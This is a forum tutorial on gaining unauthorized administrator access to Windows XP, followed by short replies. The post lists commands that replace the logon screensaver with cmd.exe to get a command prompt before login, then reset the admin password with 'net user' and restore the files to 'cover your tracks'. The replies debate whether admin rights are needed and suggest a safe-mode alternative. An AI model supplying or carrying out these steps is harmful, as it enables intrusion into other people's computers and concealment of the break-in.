[TUT] How to Hack Windows XP Admin Password
==============================================
How to Hack a Window XP Admins Password
==============================================
cd\
cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit
So what you just told windows to backup is the command program and the screen saver file. Then you edited the settings so when windows loads the screen saver, you will get an unprotected dos prompt without logging in. When this appears enter this command that’s in parenthesis (net user password). So if the admin user name is Inuyasha and you want the password w00tz11 then you would enter “net user Inuyasha w00tz11″ and now you’ve changed the admin password to w00tz11 Log in, do what you want to do, copy the contents of temphack back into system32 to cover your tracks.

I'm pretty sure you need to be an administrator to do this, so there's no point
A much better method is to press F8(?) when starting and go into safe mode and check if the root administrator didn't put a password

I'm pretty sure you don't need admin access, unless you need admin access to use the Command line.
And yeah, your method will work aswell.

Why does have to MSN? Too secreto for the forums? If you don't want people to find out about something, post it at RSF.

Won't work at schools. You need access to Windows/System32 and other core files - of course a school won't make these available.

Like I said, you need admin privileges which makes this method moot
